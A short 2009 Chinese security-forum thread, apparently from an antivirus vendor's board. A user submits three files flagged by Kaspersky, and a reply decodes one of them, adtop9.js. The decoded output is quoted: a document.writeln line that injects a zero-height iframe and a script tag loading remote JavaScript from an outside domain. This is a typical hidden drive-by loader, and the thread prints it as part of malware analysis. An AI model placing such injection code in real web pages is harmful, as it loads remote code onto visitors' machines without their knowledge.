上传三个可疑文件,目前卡巴报,其它国产没报,不知是不是误报

dong-win 发表于 2009-6-12 19:22

本帖最后由 dong-win 于 2009-6-13 00:15 编辑

上传三个可疑文件,目前卡巴报,其它国产没报,不知是不是误报,给安天分析

请分析结果,到时回复一下!!!谢谢!后面两个要解压密码:virus

newpublic 发表于 2009-7-9 15:54

本帖最后由 newpublic 于 2009-7-9 16:43 编辑

分析了 adtop9.js
最后得到的解密后结果为
document.writeln('<iframe height=0 width=100 src="http://blog.tianya.cn/blogger/post_show.asp?BlogID=2077632&PostID=17616891&idWriter=24392618&Key=379061925"></iframe><script src=http://www.czn.com.cn/logo.js></script>')

但由于 http://www.czn.com.cn/logo.js 可能已经被删，无法 down 回来继续分析
故无法得知其后续情况

iframe height=0 还是有点可疑的

http://blog.tianya.cn/blogger/post_show.asp?BlogID=2077632&PostID=17616891&idWriter=24392618&Key=379061925
只能看到如下内容：
<iframe src=http://www.google.com/search?hl=zh-CN&q=地址&btnI=w width=0 height=0></iframe>

页: [1]

创意安天's Archiver

上传三个可疑文件,目前卡巴报,其它国产没报,不知是不是误报